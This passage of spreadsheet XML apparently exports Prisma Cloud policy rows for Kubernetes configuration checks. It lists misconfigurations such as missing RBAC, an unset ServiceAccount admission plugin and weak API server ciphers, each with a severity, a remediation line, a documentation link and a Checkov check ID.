          <t>Ensure that the admission control plugin NamespaceLifecycle is set</t>
        </is>
      </c>
      <c r="X1185" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-namespacelifecycle-is-set</t>
        </is>
      </c>
      <c r="Y1185" t="inlineStr"/>
      <c r="Z1185" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1185" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1185" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1185" t="inlineStr">
        <is>
          <t>CKV_K8S_83</t>
        </is>
      </c>
      <c r="AD1185" t="b">
        <v>1</v>
      </c>
      <c r="AE1185" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1185" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>2dfa708e-008d-4585-a20b-41c788621aff</t>
        </is>
      </c>
      <c r="AI1185" t="inlineStr"/>
      <c r="AJ1185" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1185" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" t="inlineStr"/>
      <c r="B1186" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1186" s="2" t="inlineStr"/>
      <c r="D1186" t="inlineStr"/>
      <c r="E1186" t="inlineStr"/>
      <c r="F1186" t="inlineStr"/>
      <c r="G1186" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1186" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1186" t="inlineStr">
        <is>
          <t>The --authorization-mode argument does not include RBAC</t>
        </is>
      </c>
      <c r="L1186" t="inlineStr"/>
      <c r="M1186" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1186" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1186" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1186" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1186" t="inlineStr"/>
      <c r="R1186" t="inlineStr"/>
      <c r="S1186" t="inlineStr"/>
      <c r="T1186" t="b">
        <v>0</v>
      </c>
      <c r="U1186" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1186" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1186" t="inlineStr">
        <is>
          <t>Ensure that the --authorization-mode argument includes RBAC</t>
        </is>
      </c>
      <c r="X1186" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-rbac</t>
        </is>
      </c>
      <c r="Y1186" t="inlineStr"/>
      <c r="Z1186" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1186" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1186" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1186" t="inlineStr">
        <is>
          <t>CKV_K8S_77</t>
        </is>
      </c>
      <c r="AD1186" t="b">
        <v>1</v>
      </c>
      <c r="AE1186" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1186" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>8b949f5d-4e7d-4f79-98f0-d9d633f67881</t>
        </is>
      </c>
      <c r="AI1186" t="inlineStr"/>
      <c r="AJ1186" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1186" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" t="inlineStr"/>
      <c r="B1187" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1187" s="2" t="inlineStr"/>
      <c r="D1187" t="inlineStr"/>
      <c r="E1187" t="inlineStr"/>
      <c r="F1187" t="inlineStr"/>
      <c r="G1187" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1187" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1187" t="inlineStr">
        <is>
          <t>The --basic-auth-file argument is Set</t>
        </is>
      </c>
      <c r="L1187" t="inlineStr"/>
      <c r="M1187" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1187" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1187" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1187" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1187" t="inlineStr"/>
      <c r="R1187" t="inlineStr"/>
      <c r="S1187" t="inlineStr"/>
      <c r="T1187" t="b">
        <v>0</v>
      </c>
      <c r="U1187" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1187" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1187" t="inlineStr">
        <is>
          <t>Ensure that the --basic-auth-file argument is not set</t>
        </is>
      </c>
      <c r="X1187" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-basic-auth-file-argument-is-not-set</t>
        </is>
      </c>
      <c r="Y1187" t="inlineStr"/>
      <c r="Z1187" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1187" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1187" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1187" t="inlineStr">
        <is>
          <t>CKV_K8S_69</t>
        </is>
      </c>
      <c r="AD1187" t="b">
        <v>1</v>
      </c>
      <c r="AE1187" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1187" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>5baa14e0-7150-46fe-af54-6679b4d1b4db</t>
        </is>
      </c>
      <c r="AI1187" t="inlineStr"/>
      <c r="AJ1187" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1187" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" t="inlineStr"/>
      <c r="B1188" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1188" s="2" t="inlineStr"/>
      <c r="D1188" t="inlineStr"/>
      <c r="E1188" t="inlineStr"/>
      <c r="F1188" t="inlineStr"/>
      <c r="G1188" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1188" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1188" t="inlineStr">
        <is>
          <t>The --profiling argument for controller managers is not set to False</t>
        </is>
      </c>
      <c r="L1188" t="inlineStr"/>
      <c r="M1188" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1188" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1188" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1188" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1188" t="inlineStr"/>
      <c r="R1188" t="inlineStr"/>
      <c r="S1188" t="inlineStr"/>
      <c r="T1188" t="b">
        <v>0</v>
      </c>
      <c r="U1188" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1188" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1188" t="inlineStr">
        <is>
          <t>Ensure that the --profiling argument is set to false</t>
        </is>
      </c>
      <c r="X1188" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false</t>
        </is>
      </c>
      <c r="Y1188" t="inlineStr"/>
      <c r="Z1188" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1188" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1188" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1188" t="inlineStr">
        <is>
          <t>CKV_K8S_107</t>
        </is>
      </c>
      <c r="AD1188" t="b">
        <v>1</v>
      </c>
      <c r="AE1188" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1188" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>7a042645-57fd-45ed-a17e-fed49c8333e9</t>
        </is>
      </c>
      <c r="AI1188" t="inlineStr"/>
      <c r="AJ1188" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1188" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" t="inlineStr"/>
      <c r="B1189" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1189" s="2" t="inlineStr"/>
      <c r="D1189" t="inlineStr"/>
      <c r="E1189" t="inlineStr"/>
      <c r="F1189" t="inlineStr"/>
      <c r="G1189" t="b">
        <v>1</v>
      </c>
      <c r="H11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89" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1189" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1189" t="inlineStr">
        <is>
          <t>The admission control plugin ServiceAccount is not set</t>
        </is>
      </c>
      <c r="L1189" t="inlineStr"/>
      <c r="M1189" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1189" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1189" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1189" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1189" t="inlineStr"/>
      <c r="R1189" t="inlineStr"/>
      <c r="S1189" t="inlineStr"/>
      <c r="T1189" t="b">
        <v>0</v>
      </c>
      <c r="U1189" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1189" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1189" t="inlineStr">
        <is>
          <t>Ensure that the admission control plugin ServiceAccount is set</t>
        </is>
      </c>
      <c r="X1189" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-serviceaccount-is-set</t>
        </is>
      </c>
      <c r="Y1189" t="inlineStr"/>
      <c r="Z1189" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1189" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1189" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1189" t="inlineStr">
        <is>
          <t>CKV_K8S_82</t>
        </is>
      </c>
      <c r="AD1189" t="b">
        <v>1</v>
      </c>
      <c r="AE1189" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1189" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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89" t="inlineStr">
        <is>
          <t>b9d6899b-6a35-4c1c-b618-d1788578ea86</t>
        </is>
      </c>
      <c r="AI1189" t="inlineStr"/>
      <c r="AJ1189" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1189" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" t="inlineStr"/>
      <c r="B1190" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1190" s="2" t="inlineStr"/>
      <c r="D1190" t="inlineStr"/>
      <c r="E1190" t="inlineStr"/>
      <c r="F1190" t="inlineStr"/>
      <c r="G1190" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1190" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1190" t="inlineStr">
        <is>
          <t>The API server does not make use of strong cryptographic ciphers</t>
        </is>
      </c>
      <c r="L1190" t="inlineStr"/>
      <c r="M1190" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1190" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1190" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1190" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1190" t="inlineStr"/>
      <c r="R1190" t="inlineStr"/>
      <c r="S1190" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1190" t="b">
        <v>0</v>
      </c>
      <c r="U1190" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1190" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1190" t="inlineStr">
        <is>
          <t>Ensure that the API Server only makes use of Strong Cryptographic Ciphers</t>
        </is>
      </c>
      <c r="X1190" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers</t>
        </is>
      </c>
      <c r="Y1190" t="inlineStr"/>
      <c r="Z1190" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1190" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1190" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1190" t="inlineStr">
        <is>
          <t>CKV_K8S_105</t>
        </is>
      </c>
      <c r="AD1190" t="b">
        <v>1</v>
      </c>
      <c r="AE1190" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1190" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>4a0e3798-0949-43e5-8340-650cbc468179</t>
        </is>
      </c>
      <c r="AI1190" t="inlineStr"/>
      <c r="AJ1190" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1190" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" t="inlineStr"/>
      <c r="B1191" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1191" s="2" t="inlineStr"/>
      <c r="D1191" t="inlineStr"/>
      <c r="E1191" t="inlineStr"/>
      <c r="F1191" t="inlineStr"/>
      <c r="G1191" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1191" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1191" t="inlineStr">
        <is>
          <t>The --secure-port argument is set to 0</t>
        </is>
      </c>
      <c r="L1191" t="inlineStr"/>
      <c r="M1191" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1191" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1191" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1191" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1191" t="inlineStr"/>
      <c r="R1191" t="inlineStr"/>
      <c r="S1191" t="inlineStr"/>
      <c r="T1191" t="b">
        <v>0</v>
      </c>
      <c r="U1191" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1191" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1191" t="inlineStr">
        <is>
          <t>Ensure that the --secure-port argument is not set to 0</t>
        </is>
      </c>
      <c r="X1191" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-secure-port-argument-is-not-set-to-0</t>
        </is>
      </c>
      <c r="Y1191" t="inlineStr"/>
      <c r="Z1191" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1191" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1191" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1191" t="inlineStr">
        <is>
          <t>CKV_K8S_89</t>
        </is>
      </c>
      <c r="AD1191" t="b">
        <v>1</v>
      </c>
      <c r="AE1191" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1191" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>f249eee4-5695-43a9-bf08-0372dda79ce6</t>
        </is>
      </c>
      <c r="AI1191" t="inlineStr"/>
      <c r="AJ1191" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1191" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" t="inlineStr"/>
      <c r="B1192" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1192" s="2" t="inlineStr"/>
      <c r="D1192" t="inlineStr"/>
      <c r="E1192" t="inlineStr"/>
      <c r="F1192" t="inlineStr"/>
      <c r="G1192" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1192" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1192" t="inlineStr">
        <is>
          <t>The --service-account-key-file argument is not set appropriately</t>
        </is>
      </c>
      <c r="L1192" t="inlineStr"/>
      <c r="M1192" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1192" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1192" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1192" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1192" t="inlineStr"/>
      <c r="R1192" t="inlineStr"/>
      <c r="S1192" t="inlineStr"/>
      <c r="T1192" t="b">
        <v>0</v>
      </c>
      <c r="U1192" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1192" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1192" t="inlineStr">
        <is>
          <t>Ensure that the --service-account-key-file argument is set as appropriate</t>
        </is>
      </c>
      <c r="X1192" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-key-file-argument-is-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1192" t="inlineStr"/>
      <c r="Z1192" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1192" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1192" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1192" t="inlineStr">
        <is>
          <t>CKV_K8S_97</t>
        </is>
      </c>
      <c r="AD1192" t="b">
        <v>1</v>
      </c>
      <c r="AE1192" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1192" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>85a7d846-9c95-46be-9368-6c9091604505</t>
        </is>
      </c>
      <c r="AI1192" t="inlineStr"/>
      <c r="AJ1192" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1192" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" t="inlineStr"/>
      <c r="B1193" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1193" s="2" t="inlineStr"/>
      <c r="D1193" t="inlineStr"/>
      <c r="E1193" t="inlineStr"/>
      <c r="F1193" t="inlineStr"/>
      <c r="G1193" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1193" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1193" t="inlineStr">
        <is>
          <t>The --hostname-override argument is set</t>
        </is>
      </c>
      <c r="L1193" t="inlineStr"/>
      <c r="M1193" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1193" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1193" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1193" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1193" t="inlineStr"/>
      <c r="R1193" t="inlineStr"/>
      <c r="S1193" t="inlineStr"/>
      <c r="T1193" t="b">
        <v>0</v>
      </c>
      <c r="U1193" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1193" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1193" t="inlineStr">
        <is>
          <t>Ensure that the --hostname-override argument is not set</t>
        </is>
      </c>
      <c r="X1193" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-hostname-override-argument-is-not-set</t>
        </is>
      </c>
      <c r="Y1193" t="inlineStr"/>
      <c r="Z1193" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1193" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1193" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1193" t="inlineStr">
        <is>
          <t>CKV_K8S_146</t>
        </is>
      </c>
      <c r="AD1193" t="b">
        <v>1</v>
      </c>
      <c r="AE1193" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1193" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>882e2ea6-5b70-4ae4-9ddb-112f4dc3f873</t>
        </is>
      </c>
      <c r="AI1193" t="inlineStr"/>
      <c r="AJ1193" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1193" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1194">
      <c r="A1194" t="inlineStr"/>
      <c r="B1194" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1194" s="2" t="inlineStr"/>
      <c r="D1194" t="inlineStr"/>
      <c r="E1194" t="inlineStr"/>
      <c r="F1194" t="inlineStr"/>
      <c r="G1194" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1194" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1194" t="inlineStr">
        <is>
          <t>The --etcd-certfile and --etcd-keyfile arguments are not set appropriately</t>
        </is>
      </c>
      <c r="L1194" t="inlineStr"/>
      <c r="M1194" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1194" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1194" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1194" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1194" t="inlineStr"/>
      <c r="R1194" t="inlineStr"/>
      <c r="S1194" t="inlineStr"/>
      <c r="T1194" t="b">
        <v>0</v>
      </c>
      <c r="U1194" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1194" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1194" t="inlineStr">
        <is>
          <t>Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate</t>
        </is>
      </c>
      <c r="X1194" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1194" t="inlineStr"/>
      <c r="Z1194" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1194" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1194" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1194" t="inlineStr">
        <is>
          <t>CKV_K8S_99</t>
        </is>
      </c>
      <c r="AD1194" t="b">
        <v>1</v>
      </c>
      <c r="AE1194" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1194" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>2c41d0d8-f2fa-43a9-80a7-fe5623a728d3</t>
        </is>
      </c>
      <c r="AI1194" t="inlineStr"/>
      <c r="AJ1194" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1194" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" t="inlineStr"/>
      <c r="B1195" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1195" s="2" t="inlineStr"/>
      <c r="D1195" t="inlineStr"/>
      <c r="E1195" t="inlineStr"/>
      <c r="F1195" t="inlineStr"/>
      <c r="G1195" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1195" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1195" t="inlineStr">
        <is>
          <t>The --request-timeout argument is not set appropriately</t>
        </is>
      </c>
      <c r="L1195" t="inlineStr"/>
      <c r="M1195" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1195" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1195" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1195" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1195" t="inlineStr"/>
      <c r="R1195" t="inlineStr"/>
      <c r="S1195" t="inlineStr"/>
      <c r="T1195" t="b">
        <v>0</v>
      </c>
      <c r="U1195" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1195" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1195" t="inlineStr">
        <is>
          <t>Ensure that the --request-timeout argument is set as appropriate</t>
        </is>
      </c>
      <c r="X1195" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-request-timeout-argument-is-set-as-appropriate</t>
        </is>
